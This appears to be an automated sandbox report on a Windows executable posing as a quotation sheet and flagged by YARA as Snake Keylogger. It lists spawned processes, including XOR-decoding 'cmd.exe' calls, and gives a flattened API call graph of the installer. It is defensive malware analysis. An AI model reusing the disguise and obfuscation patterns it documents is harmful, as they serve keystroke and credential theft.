                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:121
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:122
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:123
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:124
                                                                              Start time:08:44:47
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "201^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:125
                                                                              Start time:08:44:47
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:126
                                                                              Start time:08:44:47
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "137^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:127
                                                                              Start time:08:44:47
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:128
                                                                              Start time:08:44:47
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:129
                                                                              Start time:08:44:47
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:131
                                                                              Start time:08:45:18
                                                                              Start date:24/07/2024
                                                                              Path:C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"
                                                                              Imagebase:0x400000
                                                                              File size:1'009'096 bytes
                                                                              MD5 hash:CFB41760F84E1E70BADE0CA7394D424B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000083.00000002.42927623951.0000000034E4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Has exited:false

                                                                                Execution Graph

                                                                                Execution Coverage:19.6%
                                                                                Dynamic/Decrypted Code Coverage:14.2%
                                                                                Signature Coverage:20.4%
                                                                                Total number of Nodes:1488
                                                                                Total number of Limit Nodes:35
                                                                                [Execution graph: interactive node/edge diagram of the sample's call flow (graph widget data, not reproducible as text)]
10001a5d 18 API calls 5021->5022 5023 10001650 5022->5023 5024 10001663 5023->5024 5025 10001657 5023->5025 5027 1000168a 5024->5027 5028 1000166d 5024->5028 5026 10001266 2 API calls 5025->5026 5035 10001661 5026->5035 5030 10001690 5027->5030 5031 100016b4 5027->5031 5029 100014e2 3 API calls 5028->5029 5033 10001672 5029->5033 5034 10001559 3 API calls 5030->5034 5032 100014e2 3 API calls 5031->5032 5032->5035 5036 10001559 3 API calls 5033->5036 5037 10001695 5034->5037 5038 10001678 5036->5038 5039 10001266 2 API calls 5037->5039 5040 10001266 2 API calls 5038->5040 5041 1000169b GlobalFree 5039->5041 5043 1000167e GlobalFree 5040->5043 5041->5035 5042 100016af GlobalFree 5041->5042 5042->5035 5043->5035 5044 40155b 5045 402877 5044->5045 5048 405dc1 wsprintfA 5045->5048 5047 40287c 5048->5047 4874 40255c 4875 402a1d 18 API calls 4874->4875 4881 402566 4875->4881 4876 4025d0 4877 405b4e ReadFile 4877->4881 4878 4025d2 4883 405dc1 wsprintfA 4878->4883 4880 4025e2 4880->4876 4882 4025f8 SetFilePointer 4880->4882 4881->4876 4881->4877 4881->4878 4881->4880 4882->4876 4883->4876 5049 40415c lstrcpynA lstrlenA 5050 40205e 5051 402a3a 18 API calls 5050->5051 5052 402065 5051->5052 5053 402a3a 18 API calls 5052->5053 5054 40206f 5053->5054 5055 402a3a 18 API calls 5054->5055 5056 402079 5055->5056 5057 402a3a 18 API calls 5056->5057 5058 402083 5057->5058 5059 402a3a 18 API calls 5058->5059 5060 40208d 5059->5060 5061 4020cc CoCreateInstance 5060->5061 5062 402a3a 18 API calls 5060->5062 5065 4020eb 5061->5065 5067 402193 5061->5067 5062->5061 5063 401423 25 API calls 5064 4021c9 5063->5064 5066 402173 MultiByteToWideChar 5065->5066 5065->5067 5066->5067 5067->5063 5067->5064 5068 40265e 5069 402664 5068->5069 5070 402668 FindNextFileA 5069->5070 5072 40267a 5069->5072 5071 4026b9 5070->5071 5070->5072 5074 405e63 lstrcpynA 5071->5074 5074->5072 5075 401cde GetDlgItem GetClientRect 5076 402a3a 18 API calls 5075->5076 5077 401d0e LoadImageA SendMessageA 5076->5077 
5078 401d2c DeleteObject 5077->5078 5079 4028cf 5077->5079 5078->5079 5080 401662 5081 402a3a 18 API calls 5080->5081 5082 401669 5081->5082 5083 402a3a 18 API calls 5082->5083 5084 401672 5083->5084 5085 402a3a 18 API calls 5084->5085 5086 40167b MoveFileA 5085->5086 5087 401687 5086->5087 5088 40168e 5086->5088 5090 401423 25 API calls 5087->5090 5089 406167 2 API calls 5088->5089 5092 4021c9 5088->5092 5091 40169d 5089->5091 5090->5092 5091->5092 5093 405d1e 38 API calls 5091->5093 5093->5087 3962 402364 3963 40236a 3962->3963 3964 402a3a 18 API calls 3963->3964 3965 40237c 3964->3965 3966 402a3a 18 API calls 3965->3966 3967 402386 RegCreateKeyExA 3966->3967 3969 4023b0 3967->3969 3978 4026a6 3967->3978 3968 4023c8 3970 4023d4 3968->3970 3979 402a1d 3968->3979 3969->3968 3971 402a3a 18 API calls 3969->3971 3973 4023ef RegSetValueExA 3970->3973 3982 402f5c 3970->3982 3974 4023c1 lstrlenA 3971->3974 3976 402405 RegCloseKey 3973->3976 3974->3968 3976->3978 3980 405e85 18 API calls 3979->3980 3981 402a31 3980->3981 3981->3970 3983 402f87 3982->3983 3984 402f6b SetFilePointer 3982->3984 3997 403064 GetTickCount 3983->3997 3984->3983 3989 403064 43 API calls 3990 402fbe 3989->3990 3991 40302a ReadFile 3990->3991 3994 402fcd 3990->3994 3996 403024 3990->3996 3991->3996 3993 405b4e ReadFile 3993->3994 3994->3993 3994->3996 4012 405b7d WriteFile 3994->4012 3996->3973 3998 403092 3997->3998 3999 4031bc 3997->3999 4014 4031e3 SetFilePointer 3998->4014 4000 402c17 33 API calls 3999->4000 4003 402f8e 4000->4003 4002 40309d SetFilePointer 4005 4030c2 4002->4005 4003->3996 4010 405b4e ReadFile 4003->4010 4005->4003 4008 405b7d WriteFile 4005->4008 4009 40319d SetFilePointer 4005->4009 4015 4031cd 4005->4015 4018 4062ff 4005->4018 4025 402c17 4005->4025 4008->4005 4009->3999 4011 402fa7 4010->4011 4011->3989 4011->3996 4013 405b9b 4012->4013 4013->3994 4014->4002 4016 405b4e ReadFile 4015->4016 4017 4031e0 4016->4017 4017->4005 4019 406324 4018->4019 4020 40632c 4018->4020 
4019->4005 4020->4019 4021 4063b3 GlobalFree 4020->4021 4022 4063bc GlobalAlloc 4020->4022 4023 406433 GlobalAlloc 4020->4023 4024 40642a GlobalFree 4020->4024 4021->4022 4022->4019 4022->4020 4023->4019 4023->4020 4024->4023 4026 402c25 4025->4026 4027 402c3d 4025->4027 4028 402c2e DestroyWindow 4026->4028 4033 402c35 4026->4033 4029 402c45 4027->4029 4030 402c4d GetTickCount 4027->4030 4028->4033 4031 406238 2 API calls 4029->4031 4032 402c5b 4030->4032 4030->4033 4031->4033 4034 402c90 CreateDialogParamA ShowWindow 4032->4034 4035 402c63 4032->4035 4033->4005 4034->4033 4035->4033 4040 402bfb 4035->4040 4037 402c71 wsprintfA 4038 40507c 25 API calls 4037->4038 4039 402c8e 4038->4039 4039->4033 4041 402c0a 4040->4041 4042 402c0c MulDiv 4040->4042 4041->4042 4042->4037 5108 401567 5109 401577 ShowWindow 5108->5109 5110 40157e 5108->5110 5109->5110 5111 40158c ShowWindow 5110->5111 5112 4028cf 5110->5112 5111->5112 4043 401dea 4044 402a3a 18 API calls 4043->4044 4045 401df0 4044->4045 4046 402a3a 18 API calls 4045->4046 4047 401df9 4046->4047 4048 402a3a 18 API calls 4047->4048 4049 401e02 4048->4049 4050 402a3a 18 API calls 4049->4050 4051 401e0b 4050->4051 4055 401423 4051->4055 4054 401e3f 4056 40507c 25 API calls 4055->4056 4057 401431 ShellExecuteA 4056->4057 4057->4054 5120 401eee 5121 402a3a 18 API calls 5120->5121 5122 401ef5 5121->5122 5123 4061fc 5 API calls 5122->5123 5124 401f04 5123->5124 5125 401f1c GlobalAlloc 5124->5125 5126 401f84 5124->5126 5125->5126 5127 401f30 5125->5127 5128 4061fc 5 API calls 5127->5128 5129 401f37 5128->5129 5130 4061fc 5 API calls 5129->5130 5131 401f41 5130->5131 5131->5126 5135 405dc1 wsprintfA 5131->5135 5133 401f78 5136 405dc1 wsprintfA 5133->5136 5135->5133 5136->5126 5137 4014f0 SetForegroundWindow 5138 4028cf 5137->5138 5139 404ff0 5140 405000 5139->5140 5141 405014 5139->5141 5143 405006 5140->5143 5144 40505d 5140->5144 5142 40501c IsWindowVisible 5141->5142 5150 405033 5141->5150 5142->5144 5145 405029 5142->5145 
5147 404094 SendMessageA 5143->5147 5146 405062 CallWindowProcA 5144->5146 5152 404947 SendMessageA 5145->5152 5149 405010 5146->5149 5147->5149 5150->5146 5157 4049c7 5150->5157 5153 4049a6 SendMessageA 5152->5153 5154 40496a GetMessagePos ScreenToClient SendMessageA 5152->5154 5156 40499e 5153->5156 5155 4049a3 5154->5155 5154->5156 5155->5153 5156->5150 5166 405e63 lstrcpynA 5157->5166 5159 4049da 5167 405dc1 wsprintfA 5159->5167 5161 4049e4 5162 40140b 2 API calls 5161->5162 5163 4049ed 5162->5163 5168 405e63 lstrcpynA 5163->5168 5165 4049f4 5165->5144 5166->5159 5167->5161 5168->5165 5169 100015b3 5170 100014bb GlobalFree 5169->5170 5172 100015cb 5170->5172 5171 10001611 GlobalFree 5172->5171 5173 100015e6 5172->5173 5174 100015fd VirtualFree 5172->5174 5173->5171 5174->5171 4727 403b75 4728 403cc8 4727->4728 4729 403b8d 4727->4729 4731 403d19 4728->4731 4732 403cd9 GetDlgItem GetDlgItem 4728->4732 4729->4728 4730 403b99 4729->4730 4734 403ba4 SetWindowPos 4730->4734 4735 403bb7 4730->4735 4733 403d73 4731->4733 4741 401389 2 API calls 4731->4741 4736 404048 19 API calls 4732->4736 4737 404094 SendMessageA 4733->4737 4757 403cc3 4733->4757 4734->4735 4738 403bd4 4735->4738 4739 403bbc ShowWindow 4735->4739 4740 403d03 SetClassLongA 4736->4740 4756 403d85 4737->4756 4742 403bf6 4738->4742 4743 403bdc DestroyWindow 4738->4743 4739->4738 4744 40140b 2 API calls 4740->4744 4747 403d4b 4741->4747 4745 403bfb SetWindowLongA 4742->4745 4746 403c0c 4742->4746 4796 403fd1 4743->4796 4744->4731 4745->4757 4748 403cb5 4746->4748 4749 403c18 GetDlgItem 4746->4749 4747->4733 4750 403d4f SendMessageA 4747->4750 4806 4040af 4748->4806 4753 403c2b SendMessageA IsWindowEnabled 4749->4753 4760 403c48 4749->4760 4750->4757 4751 40140b 2 API calls 4751->4756 4752 403fd3 DestroyWindow EndDialog 4752->4796 4753->4757 4753->4760 4755 404002 ShowWindow 4755->4757 4756->4751 4756->4752 4756->4757 4758 405e85 18 API calls 4756->4758 4763 404048 19 API calls 4756->4763 4787 403f13 
DestroyWindow 4756->4787 4797 404048 4756->4797 4758->4756 4759 403c4d 4803 404021 4759->4803 4760->4759 4761 403c55 4760->4761 4764 403c9c SendMessageA 4760->4764 4765 403c68 4760->4765 4761->4759 4761->4764 4763->4756 4764->4748 4767 403c70 4765->4767 4768 403c85 4765->4768 4766 403c83 4766->4748 4770 40140b 2 API calls 4767->4770 4769 40140b 2 API calls 4768->4769 4771 403c8c 4769->4771 4770->4759 4771->4748 4771->4759 4773 403e00 GetDlgItem 4774 403e15 4773->4774 4775 403e1d ShowWindow KiUserCallbackDispatcher 4773->4775 4774->4775 4800 40406a KiUserCallbackDispatcher 4775->4800 4777 403e47 EnableWindow 4780 403e5b 4777->4780 4778 403e60 GetSystemMenu EnableMenuItem SendMessageA 4779 403e90 SendMessageA 4778->4779 4778->4780 4779->4780 4780->4778 4801 40407d SendMessageA 4780->4801 4802 405e63 lstrcpynA 4780->4802 4783 403ebe lstrlenA 4784 405e85 18 API calls 4783->4784 4785 403ecf SetWindowTextA 4784->4785 4786 401389 2 API calls 4785->4786 4786->4756 4788 403f2d CreateDialogParamA 4787->4788 4787->4796 4789 403f60 4788->4789 4788->4796 4790 404048 19 API calls 4789->4790 4791 403f6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4790->4791 4792 401389 2 API calls 4791->4792 4793 403fb1 4792->4793 4793->4757 4794 403fb9 ShowWindow 4793->4794 4795 404094 SendMessageA 4794->4795 4795->4796 4796->4755 4796->4757 4798 405e85 18 API calls 4797->4798 4799 404053 SetDlgItemTextA 4798->4799 4799->4773 4800->4777 4801->4780 4802->4783 4804 404028 4803->4804 4805 40402e SendMessageA 4803->4805 4804->4805 4805->4766 4807 404150 4806->4807 4808 4040c7 GetWindowLongA 4806->4808 4807->4757 4808->4807 4809 4040d8 4808->4809 4810 4040e7 GetSysColor 4809->4810 4811 4040ea 4809->4811 4810->4811 4812 4040f0 SetTextColor 4811->4812 4813 4040fa SetBkMode 4811->4813 4812->4813 4814 404112 GetSysColor 4813->4814 4815 404118 4813->4815 4814->4815 4816 40411f SetBkColor 4815->4816 4817 404129 4815->4817 4816->4817 4817->4807 4818 404143 CreateBrushIndirect 4817->4818 4819 40413c 
DeleteObject 4817->4819 4818->4807 4819->4818 5180 4018f5 5181 40192c 5180->5181 5182 402a3a 18 API calls 5181->5182 5183 401931 5182->5183 5184 405705 69 API calls 5183->5184 5185 40193a 5184->5185 5186 4024f7 5187 402a3a 18 API calls 5186->5187 5188 4024fe 5187->5188 5191 405ad6 GetFileAttributesA CreateFileA 5188->5191 5190 40250a 5191->5190 5192 4018f8 5193 402a3a 18 API calls 5192->5193 5194 4018ff 5193->5194 5195 405659 MessageBoxIndirectA 5194->5195 5196 401908 5195->5196 5197 4049f9 GetDlgItem GetDlgItem 5198 404a4b 7 API calls 5197->5198 5205 404c63 5197->5205 5199 404ae1 SendMessageA 5198->5199 5200 404aee DeleteObject 5198->5200 5199->5200 5201 404af7 5200->5201 5203 404b2e 5201->5203 5204 405e85 18 API calls 5201->5204 5202 404d47 5207 404df3 5202->5207 5217 404da0 SendMessageA 5202->5217 5240 404c56 5202->5240 5206 404048 19 API calls 5203->5206 5208 404b10 SendMessageA SendMessageA 5204->5208 5205->5202 5215 404947 5 API calls 5205->5215 5238 404cd4 5205->5238 5211 404b42 5206->5211 5209 404e05 5207->5209 5210 404dfd SendMessageA 5207->5210 5208->5201 5214 404e2e 5209->5214 5220 404e17 ImageList_Destroy 5209->5220 5221 404e1e 5209->5221 5210->5209 5216 404048 19 API calls 5211->5216 5212 4040af 8 API calls 5219 404fe9 5212->5219 5213 404d39 SendMessageA 5213->5202 5222 404f9d 5214->5222 5239 4049c7 4 API calls 5214->5239 5244 404e69 5214->5244 5215->5238 5228 404b50 5216->5228 5218 404db5 SendMessageA 5217->5218 5217->5240 5225 404dc8 5218->5225 5220->5221 5221->5214 5223 404e27 GlobalFree 5221->5223 5226 404faf ShowWindow GetDlgItem ShowWindow 5222->5226 5222->5240 5223->5214 5224 404c24 GetWindowLongA SetWindowLongA 5227 404c3d 5224->5227 5232 404dd9 SendMessageA 5225->5232 5226->5240 5229 404c43 ShowWindow 5227->5229 5230 404c5b 5227->5230 5228->5224 5231 404b9f SendMessageA 5228->5231 5233 404c1e 5228->5233 5236 404bdb SendMessageA 5228->5236 5237 404bec SendMessageA 5228->5237 5248 40407d SendMessageA 5229->5248 5249 40407d SendMessageA 
5230->5249 5231->5228 5232->5207 5233->5224 5233->5227 5236->5228 5237->5228 5238->5202 5238->5213 5239->5244 5240->5212 5241 404f73 InvalidateRect 5241->5222 5242 404f89 5241->5242 5250 404902 5242->5250 5243 404e97 SendMessageA 5247 404ead 5243->5247 5244->5243 5244->5247 5246 404f21 SendMessageA SendMessageA 5246->5247 5247->5241 5247->5246 5248->5240 5249->5205 5253 40483d 5250->5253 5252 404917 5252->5222 5254 404853 5253->5254 5255 405e85 18 API calls 5254->5255 5256 4048b7 5255->5256 5257 405e85 18 API calls 5256->5257 5258 4048c2 5257->5258 5259 405e85 18 API calls 5258->5259 5260 4048d8 lstrlenA wsprintfA SetDlgItemTextA 5259->5260 5260->5252 5268 1000103d 5269 1000101b 5 API calls 5268->5269 5270 10001056 5269->5270 5271 4014fe 5272 401506 5271->5272 5274 401519 5271->5274 5273 402a1d 18 API calls 5272->5273 5273->5274 5275 402b7f 5276 402ba7 5275->5276 5277 402b8e SetTimer 5275->5277 5278 402bf5 5276->5278 5279 402bfb MulDiv 5276->5279 5277->5276 5280 402bb5 wsprintfA SetWindowTextA SetDlgItemTextA 5279->5280 5280->5278 5282 401000 5283 401037 BeginPaint GetClientRect 5282->5283 5284 40100c DefWindowProcA 5282->5284 5285 4010f3 5283->5285 5287 401179 5284->5287 5288 401073 CreateBrushIndirect FillRect DeleteObject 5285->5288 5289 4010fc 5285->5289 5288->5285 5290 401102 CreateFontIndirectA 5289->5290 5291 401167 EndPaint 5289->5291 5290->5291 5292 401112 6 API calls 5290->5292 5291->5287 5292->5291 5293 402482 5294 402b44 19 API calls 5293->5294 5295 40248c 5294->5295 5296 402a1d 18 API calls 5295->5296 5297 402495 5296->5297 5298 4024b8 RegEnumValueA 5297->5298 5299 4024ac RegEnumKeyA 5297->5299 5300 4026a6 5297->5300 5298->5300 5301 4024d1 RegCloseKey 5298->5301 5299->5301 5301->5300 5303 401b02 5304 402a3a 18 API calls 5303->5304 5305 401b09 5304->5305 5306 402a1d 18 API calls 5305->5306 5307 401b12 wsprintfA 5306->5307 5308 4028cf 5307->5308 5309 401a03 5310 402a3a 18 API calls 5309->5310 5311 401a0c ExpandEnvironmentStringsA 5310->5311 5312 401a20 
5311->5312 5314 401a33 5311->5314 5313 401a25 lstrcmpA 5312->5313 5312->5314 5313->5314 5315 402283 5316 402291 5315->5316 5317 40228b 5315->5317 5319 402a3a 18 API calls 5316->5319 5322 4022a1 5316->5322 5318 402a3a 18 API calls 5317->5318 5318->5316 5319->5322 5320 402a3a 18 API calls 5323 4022af 5320->5323 5321 402a3a 18 API calls 5324 4022b8 WritePrivateProfileStringA 5321->5324 5322->5320 5322->5323 5323->5321 5325 100029c3 5326 100029db 5325->5326 5327 10001534 2 API calls 5326->5327 5328 100029f6 5327->5328 5329 404486 5330 4044b2 5329->5330 5331 4044c3 5329->5331 5390 40563d GetDlgItemTextA 5330->5390 5333 4044cf GetDlgItem 5331->5333 5334 40452e 5331->5334 5337 4044e3 5333->5337 5335 404612 5334->5335 5342 405e85 18 API calls 5334->5342 5388 4047bc 5334->5388 5335->5388 5392 40563d GetDlgItemTextA 5335->5392 5336 4044bd 5338 4060ce 5 API calls 5336->5338 5340 4044f7 SetWindowTextA 5337->5340 5341 40596e 4 API calls 5337->5341 5338->5331 5344 404048 19 API calls 5340->5344 5346 4044ed 5341->5346 5347 4045a2 SHBrowseForFolderA 5342->5347 5343 404642 5348 4059c3 18 API calls 5343->5348 5349 404513 5344->5349 5345 4040af 8 API calls 5350 4047d0 5345->5350 5346->5340 5354 4058d5 3 API calls 5346->5354 5347->5335 5351 4045ba CoTaskMemFree 5347->5351 5352 404648 5348->5352 5353 404048 19 API calls 5349->5353 5355 4058d5 3 API calls 5351->5355 5393 405e63 lstrcpynA 5352->5393 5356 404521 5353->5356 5354->5340 5359 4045c7 5355->5359 5391 40407d SendMessageA 5356->5391 5360 4045fe SetDlgItemTextA 5359->5360 5365 405e85 18 API calls 5359->5365 5360->5335 5361 404527 5363 4061fc 5 API calls 5361->5363 5362 40465f 5364 4061fc 5 API calls 5362->5364 5363->5334 5371 404666 5364->5371 5366 4045e6 lstrcmpiA 5365->5366 5366->5360 5369 4045f7 lstrcatA 5366->5369 5367 4046a2 5394 405e63 lstrcpynA 5367->5394 5369->5360 5370 4046a9 5372 40596e 4 API calls 5370->5372 5371->5367 5375 40591c 2 API calls 5371->5375 5377 4046fa 5371->5377 5373 4046af GetDiskFreeSpaceA 5372->5373 
5376 4046d3 MulDiv 5373->5376 5373->5377 5375->5371 5376->5377 5378 40476b 5377->5378 5380 404902 21 API calls 5377->5380 5379 40478e 5378->5379 5381 40140b 2 API calls 5378->5381 5395 40406a KiUserCallbackDispatcher 5379->5395 5382 404758 5380->5382 5381->5379 5384 40476d SetDlgItemTextA 5382->5384 5385 40475d 5382->5385 5384->5378 5387 40483d 21 API calls 5385->5387 5386 4047aa 5386->5388 5396 40441b 5386->5396 5387->5378 5388->5345 5390->5336 5391->5361 5392->5343 5393->5362 5394->5370 5395->5386 5397 404429 5396->5397 5398 40442e SendMessageA 5396->5398 5397->5398 5398->5388 5399 402688 5400 402a3a 18 API calls 5399->5400 5401 40268f FindFirstFileA 5400->5401 5402 4026b2 5401->5402 5406 4026a2 5401->5406 5403 4026b9 5402->5403 5407 405dc1 wsprintfA 5402->5407 5408 405e63 lstrcpynA 5403->5408 5407->5403 5408->5406 5409 402308 5410 402338 5409->5410 5411 40230d 5409->5411 5413 402a3a 18 API calls 5410->5413 5412 402b44 19 API calls 5411->5412 5414 402314 5412->5414 5415 40233f 5413->5415 5416 402a3a 18 API calls 5414->5416 5419 402355 5414->5419 5420 402a7a RegOpenKeyExA 5415->5420 5417 402325 RegDeleteValueA RegCloseKey 5416->5417 5417->5419 5421 402af1 5420->5421 5423 402aa5 5420->5423 5421->5419 5422 402acb RegEnumKeyA 5422->5423 5424 402add RegCloseKey 5422->5424 5423->5422 5423->5424 5425 402b02 RegCloseKey 5423->5425 5427 402a7a 5 API calls 5423->5427 5426 4061fc 5 API calls 5424->5426 5425->5421 5428 402aed 5426->5428 5427->5423 5428->5421 5429 402b1d RegDeleteKeyA 5428->5429 5429->5421 5430 401c8a 5431 402a1d 18 API calls 5430->5431 5432 401c90 IsWindow 5431->5432 5433 4019f3 5432->5433 4456 401f90 4457 401fa2 4456->4457 4458 402050 4456->4458 4459 402a3a 18 API calls 4457->4459 4460 401423 25 API calls 4458->4460 4461 401fa9 4459->4461 4467 4021c9 4460->4467 4462 402a3a 18 API calls 4461->4462 4463 401fb2 4462->4463 4464 401fc7 LoadLibraryExA 4463->4464 4465 401fba GetModuleHandleA 4463->4465 4464->4458 4466 401fd7 GetProcAddress 4464->4466 4465->4464 
4465->4466 4468 402023 4466->4468 4469 401fe6 4466->4469 4472 40507c 25 API calls 4468->4472 4470 402005 4469->4470 4471 401fee 4469->4471 4477 100016bd 4470->4477 4473 401423 25 API calls 4471->4473 4474 401ff6 4472->4474 4473->4474 4474->4467 4475 402044 FreeLibrary 4474->4475 4475->4467 4478 100016ed 4477->4478 4519 10001a5d 4478->4519 4480 100016f4 4481 1000180a 4480->4481 4482 10001705 4480->4482 4483 1000170c 4480->4483 4481->4474 4568 100021b0 4482->4568 4551 100021fa 4483->4551 4488 10001770 4494 100017b2 4488->4494 4495 10001776 4488->4495 4489 10001752 4581 100023da 4489->4581 4490 10001722 4493 10001728 4490->4493 4499 10001733 4490->4499 4491 1000173b 4504 10001731 4491->4504 4578 10002aa3 4491->4578 4493->4504 4562 100027e8 4493->4562 4497 100023da 11 API calls 4494->4497 4501 10001559 3 API calls 4495->4501 4502 100017a4 4497->4502 4498 10001758 4592 10001559 4498->4592 4572 10002589 4499->4572 4506 1000178c 4501->4506 4518 100017f9 4502->4518 4603 100023a0 4502->4603 4504->4488 4504->4489 4509 100023da 11 API calls 4506->4509 4508 10001739 4508->4504 4509->4502 4511 10001803 GlobalFree 4511->4481 4515 100017e5 4515->4518 4607 100014e2 wsprintfA 4515->4607 4516 100017de FreeLibrary 4516->4515 4518->4481 4518->4511 4610 10001215 GlobalAlloc 4519->4610 4521 10001a81 4611 10001215 GlobalAlloc 4521->4611 4523 10001cbb GlobalFree GlobalFree GlobalFree 4524 10001cd8 4523->4524 4543 10001d22 4523->4543 4525 1000201a 4524->4525 4532 10001ced 4524->4532 4524->4543 4527 1000203c GetModuleHandleA 4525->4527 4525->4543 4526 10001b60 GlobalAlloc 4547 10001a8c 4526->4547 4530 10002062 4527->4530 4531 1000204d LoadLibraryA 4527->4531 4528 10001bab lstrcpyA 4533 10001bb5 lstrcpyA 4528->4533 4529 10001bc9 GlobalFree 4529->4547 4618 100015a4 GetProcAddress 4530->4618 4531->4530 4531->4543 4532->4543 4614 10001224 4532->4614 4533->4547 4535 100020b3 4537 100020c0 lstrlenA 4535->4537 4535->4543 4536 10001f7a 4542 10001fbe lstrcpyA 4536->4542 4536->4543 4619 100015a4 
GetProcAddress 4537->4619 4539 10002074 4539->4535 4550 1000209d GetProcAddress 4539->4550 4542->4543 4543->4480 4544 10001c07 4544->4547 4612 10001534 GlobalSize GlobalAlloc 4544->4612 4545 10001e75 GlobalFree 4545->4547 4546 100020d9 4546->4543 4547->4523 4547->4526 4547->4528 4547->4529 4547->4533 4547->4536 4547->4543 4547->4544 4547->4545 4549 10001224 2 API calls 4547->4549 4617 10001215 GlobalAlloc 4547->4617 4549->4547 4550->4535 4558 10002212 4551->4558 4552 10001224 GlobalAlloc lstrcpynA 4552->4558 4554 10002349 GlobalFree 4557 10001712 4554->4557 4554->4558 4555 100022b9 GlobalAlloc MultiByteToWideChar 4559 10002303 4555->4559 4560 100022e3 GlobalAlloc CLSIDFromString GlobalFree 4555->4560 4556 1000230a lstrlenA 4556->4554 4556->4559 4557->4490 4557->4491 4557->4504 4558->4552 4558->4554 4558->4555 4558->4556 4621 100012ad 4558->4621 4559->4554 4625 1000251d 4559->4625 4560->4554 4564 100027fa 4562->4564 4563 1000289f SetFilePointer 4565 100028bd 4563->4565 4564->4563 4566 100029b9 4565->4566 4567 100029ae GetLastError 4565->4567 4566->4504 4567->4566 4569 100021c0 4568->4569 4570 1000170b 4568->4570 4569->4570 4571 100021d2 GlobalAlloc 4569->4571 4570->4483 4571->4569 4576 100025a5 4572->4576 4573 100025f6 GlobalAlloc 4577 10002618 4573->4577 4574 10002609 4575 